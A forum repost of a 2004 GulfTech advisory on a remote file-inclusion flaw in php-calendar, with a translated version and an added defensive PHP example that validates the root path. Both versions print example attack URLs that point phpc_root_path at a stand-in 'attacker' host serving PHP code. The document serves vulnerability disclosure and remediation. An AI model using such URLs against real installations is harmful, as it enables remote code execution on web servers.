[Repost] php-Calendar File Include Vulnerability (Command Exec)
Source: [url]www.securityfocus.com[/url]
##########################################################
# GulfTech Security Research December 28th, 2004
##########################################################
# Vendor : Sean Proctor
# URL : [url]http://php-calendar.sourceforge.net/[/url]
# Version : All Versions
# Risk : File Include Vulnerability
##########################################################
Description:
I was searching for a decent calendar which my group at school
could use to keep track of events, etc. We were previously using
localendar, which I didn't like and it had some problems. I found
CST-Calendar which did most of what I wanted, but was rather ugly
and missed some features others in the group wanted. So, I
gradually re-wrote CST-Calendar since that project seems to have
stopped work entirely. [ As quoted from their website ]
File Include Vulnerability:
There is a very dangerous file include vulnerability in
php-calendar, and making the issue even more dangerous is that I
found out about php-calendar from an individual who said that
php-calendar is a great open source calendar to use in php projects,
and is fairly popular amongst open source php developers. This may be
true, but the vulnerabilities need to be fixed if the same conditions
apply as found in the original code. Below are example attack URLs:
[url]http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php[/url]
[url]http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php[/url]
If php globals are set to on then it is highly probable that an
attacker will be able to include arbitrary php files and thus execute
system commands with the rights of the web server. This can be very
dangerous in some situations.
Solution:
php-calendar has a defined constant to help prevent against stuff
like this. It can be seen in other php-calendar files such as db.php
// refuse to run unless loaded through the application, which defines IN_PHPC
if ( !defined('IN_PHPC') ) {
    die("Hacking attempt");
}
Adding this check to the top of the affected pages should suffice
in preventing the kinds of attacks previously mentioned in this advisory.
Related Info:
The original advisory can be found at the following location
[url]http://www.gulftech.org/?node=research&article_id=00060-12292004[/url]
Credits:
James Bercegay of the GulfTech Security Research Team
Translated version
php-Calendar File Include Vulnerability
Author: Z.C.Y[B.C.T] Site: [url]http://www.bnso.net[/url]
Source: original translation
Reads: 3
Published: 2004-12-31
From: "GulfTech Security" <security () gulftech ! org>
Date: 2004-12-29 14:43:37
##########################################################
# GulfTech Security Research 2004-12-28
##########################################################
# Vendor : Sean Proctor
# URL : [url]http://php-calendar.sourceforge.net/[/url]
# Version : All versions
# Risk : File include vulnerability
##########################################################
Description: So that my group could keep track of events, I had spent quite some time looking for a web calendar program. We previously used
localendar, but I didn't like it and it also had many problems. Later I found CST-Calendar, which had many
of the features I wanted, but its interface was rather ugly and it lacked some other features our group wanted. So, since that
project had stopped entirely, I rewrote CST-Calendar.
File include vulnerability:
php-calendar has a very dangerous file include vulnerability, and what makes the issue even more dangerous is that I found
a statement from the company producing php-calendar saying that php-calendar is a fully open source calendar for PHP projects,
and that php-calendar is quite popular among open source PHP developers. This may be true, but if the same conditions are found in the original
code, then this vulnerability needs to be fixed.
Below are example attack URLs:
[url]http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php[/url]
[url]http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php[/url]
If php globals is set to ON, an attacker is very likely able to include arbitrary PHP files and thereby obtain
the web server's system privileges. In some situations this is very dangerous.
Solution: php-calendar's defined constant can help prevent this vulnerability.
It can be seen in other php-calendar files such as db.php
// refuse to run unless loaded through the application, which defines IN_PHPC
if ( !defined('IN_PHPC') ) {
    die("Hacking attempt");
}
Adding this to the top of the affected pages is enough to block the attacks mentioned above.
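To make the guard concrete for both the English Solution section and its translation above, here is an added example that is not php-calendar's own code. It shows the IN_PHPC check the advisory quotes from db.php together with a root-path check that rejects the remote value carried in the advisory's example URLs. The function names, the assumed index.php entry point and the file layout are illustrative assumptions.

```php
<?php
// Added example, not php-calendar's own code: the IN_PHPC guard from the
// advisory plus a root-path check that rejects the remote value its attack
// URLs carry. Function names and the file layout are assumptions.

// The application's entry point (assumed index.php) defines this before
// including any library file; library files refuse to run without it.
define('IN_PHPC', true);

// True only when $candidate is a local directory that resolves to $appRoot
// or somewhere beneath it. A URL such as http://attacker/includes/ fails
// both the scheme test and realpath(), so it can never reach include().
function phpc_root_path_is_safe($candidate, $appRoot)
{
    // Anything carrying a scheme (http:, ftp:, php:, data:) is a remote
    // resource or a stream wrapper, never an on-disk directory. A Windows
    // drive letter matches too; pass a relative path on that platform.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return false;
    }
    $real = realpath($candidate);
    $root = realpath($appRoot);
    if ($real === false || $root === false) {
        return false;   // path does not exist: refuse rather than guess
    }
    return $real === $root
        || strpos($real, $root . DIRECTORY_SEPARATOR) === 0;
}

// What each included file (calendar.php, setup.php, ...) should do at its
// top, mirroring the check the advisory quotes from db.php. It returns a
// root path derived from the file system, so a value injected through
// register_globals is simply ignored.
function phpc_guard_or_die($appRoot)
{
    if (!defined('IN_PHPC')) {
        die('Hacking attempt');
    }
    return rtrim($appRoot, '/\\') . '/';
}

// Worked check: the attack value is constructed from the advisory's URLs,
// the other two are the application directory and a path that climbs above it.
$appRoot = dirname(__FILE__);
$attack  = 'http://attacker/includes/';
var_dump(phpc_root_path_is_safe($attack, $appRoot));
var_dump(phpc_root_path_is_safe($appRoot, $appRoot));
var_dump(phpc_root_path_is_safe($appRoot . '/../', $appRoot));

// Included files take their root from the guard, not from the request.
$phpc_root_path = phpc_guard_or_die($appRoot);
// include $phpc_root_path . 'includes/html.php';  // fixed local path only
```

Run as a normal PHP script: the remote value and the path that climbs above the application directory are rejected, and the application directory itself is accepted. The guard stops direct requests to the library files, while deriving the root from dirname(__FILE__) removes the dependence on request data that the advisory's condition (php globals on) makes exploitable; turning register_globals and allow_url_fopen off in php.ini (and allow_url_include, which exists from PHP 5.2 on) closes the same class at the interpreter level.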
Related information:
The original advisory can be found at the following location
[url]http://www.gulftech.org/?node=research&article_id=00060-12292004[/url]
Discovered by:
James Bercegay of the GulfTech Security Research Team